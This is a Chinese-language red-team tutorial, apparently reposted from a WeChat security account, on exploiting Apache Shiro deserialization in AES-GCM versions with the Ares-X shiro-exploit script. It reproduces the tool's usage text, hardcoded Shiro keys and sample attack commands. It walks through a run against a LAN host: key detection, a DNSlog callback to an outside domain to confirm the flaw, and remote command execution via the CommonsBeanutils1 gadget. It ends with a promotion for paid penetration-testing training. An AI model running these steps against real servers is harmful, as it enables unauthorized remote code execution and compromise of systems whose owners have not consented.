1简介
新版本Shiro(>=1.4.2)采用了AES-GCM加密方式,导致旧版工具的加密算法无法正常利用漏洞
如果知道硬编码的情况下可以使用工具
shiro_attack-4.5.3-SNAPSHOT-all 勾上 aes gsm 使用即可
2Ares-X使用
也可以使用脚本 https://github.com/Ares-X/shiro-exploit 进行利用
pip3 install pycryptodome安装依赖包
python shiro-exploit.py -husage: shiro-exploit.py [-h] [--version VERSION] [--key KEY] [--url URL] [--gadget GADGET] [--command COMMAND][--ser SER]modeShiro-Exploit : Use python3 shiro-exploit.py usage for More Help Infomationpositional arguments:mode check/yso/echo/encdoeoptional arguments:-h, --help show this help message and exit--version VERSION, -v VERSIONChoice Shiro Encrypt Version,1 For AES-CBC 2 For AES-GCM--key KEY, -k KEY Specific shiro key or user default--url URL, -u URL Specific URL Address--gadget GADGET, -g GADGETSpecific Gadget [CommonsCollectionsK1/CommonsCollectionsK2/CommonsBeanutils1/CommonsBeanutils2/Jdk7u21/Jdk8u20]--command COMMAND, -c COMMANDSpecific Execute Command--ser SER, -s SER Specific serialize File Path
Usage:python3 shiro-exploit.py mode argumentsYou Can Change Default Key and Ysoserial Path at The Top of FileFor Most Usage: [-u url] Will Send Payload To Target URLLeft it Empty to Genereate Payload and Exploit Manual[-k key] Will Encrypt Payload With Specific KeyLeft it Empty to Use Shiro Default Key kPH+bIxk5D2deZiIxcaaaA==[-v version]Will Encrypt Payload to Specific Shiro Encrypt Versionif Shiro Version Used AES-CBC Set -v to 1 , if Shiro Used AES-GCM Set -v to 2 , or Left it Empty to Use Default 1Those arguments is Not Necessary , Change it If You NeedSample:python3 shiro-exploit.py check -u http://127.0.0.1 Auto Detect Shiro Key For Version 1 And Version 2python3 shiro-exploit.py check -u http://127.0.0.1 -v 1 Auto Detect Shiro Key For Version 1python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Check Specific Key Payload For Version 1 and 2python3 shiro-exploit.py check -k zSyK5Kp6PZAAjlT+eeNMlg== -v 2 Genereate Check Specific Key Payload For Version 2python3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -u http://127.0.0.1 -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Send Ysoserial Payload to Target URLpython3 shiro-exploit.py yso -g URLDNS -c "http://xxx.dnslog.pro" -k zSyK5Kp6PZAAjlT+eeNMlg== -v 1 Genereate Ysoserial Payloadpython3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -u http://127.0.0.1 Send Tomcat Echo Payload To Target URLpython3 shiro-exploit.py echo -g CommonsCollectionsK1 -c "ifconfig" -k zSyK5Kp6PZAAjlT+eeNMlg== Genereate Tomcat Echo Payloadpython3 shiro-exploit.py encode -s ./cookie.ser -u http://127.0.0.1 Encode Serialize File And Send to Target URLpython3 shiro-exploit.py encode -s ./cookie.ser -k zSyK5Kp6PZAAjlT+eeNMlg== Encode Serialize File For Exploit Manual
脚本自带一些硬编码,这里是知道硬编码的。所以把编码加进行就可以了。
检测硬编码
2是 gsm加密方式
python shiro-exploit.py check -u http://192.168.0.115:8080 -v 2知道硬编码的前提下可以使用key进行检测
利用dnslog检测目标是否存在漏洞
shiro-exploit.py yso -g URLDNS -c "http://moonsec.03d3fu.dnslog.cn" -k d3d3bWluZ3NvZnRuZXRtcw== -u http://192.168.0.115:8080/xxx/ms/login.do -v 2Gadget: URLDNS Command: http://moonsec.03d3fu.dnslog.cnSend Over:200
命令执行 shiro一般使用 CommonsBeanutils1 这无依赖链子
shiro-exploit.py echo -g CommonsBeanutils1 -u http://192.168.0.115:8080/xxx/ms/index.do -v 2 -k d3d3bWluZ3NvZnRuZXRtcw== -c whoami
3关注公众号
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
6关注培训
需要渗透测试培训可联系暗月
课程详细介绍点击即可了解
原文始发于微信公众号(moonsec):红队攻击第1篇 shiro AES_GCM 反序列化利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论